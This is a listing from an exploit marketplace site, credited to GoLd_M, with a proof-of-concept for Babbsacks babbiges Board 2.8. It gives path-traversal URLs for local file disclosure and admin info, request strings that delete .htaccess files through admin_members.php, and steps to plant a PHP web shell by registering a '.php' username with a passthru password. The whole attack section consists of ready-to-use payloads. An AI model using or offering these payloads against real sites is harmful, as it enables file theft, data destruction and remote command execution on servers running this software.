[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites

Author
GoLd_M
Risk
[
Security Risk High
]
0day-ID
0day-ID-19175
Category
web applications
Date add
12-08-2012
Platform
php
# Exploit Title: Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites
# Date: 12/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/babb/
# Category:: Local File Disclosure + Arbitrary Delete + File Overwrite
# Google dork: :(
# Tested on: Xp SP 2
# Poc : 
# 1- Local File Disclosure Vulnerability
# /beitragzeigen.php?code=/../../../../index.php
# /beitragzeigen.php?code=/..
# /beitragzeigen.php?code=/../members/memadmin - Get Info Admin
# After Login Admin Control
# 2- Arbitrary Delete Vulnerability
# /admin_members.php?mem=../../../.htaccess&del=true&best=true 
# /admin_members.php?mem=../../.htaccess&del=true&best=true 
# /admin_members.php?mem=../.htaccess&del=true&best=true 
# Delet .htaccess All Files
# 3- Arbitrary File Overwrite (Shell) 
# * Reg username as (a.php)
# * Ur Pass As <? passthru("$_GET[cmd]");?>
# * Go /data/babb/members/mem[username]
# * As /data/babb/members/mema.php?cmd=dir
##############################################################
#     Video : http://www.youtube.com/watch?v=WsLvmUN479I     #
##############################################################



#  0day.today [2024-12-25]  #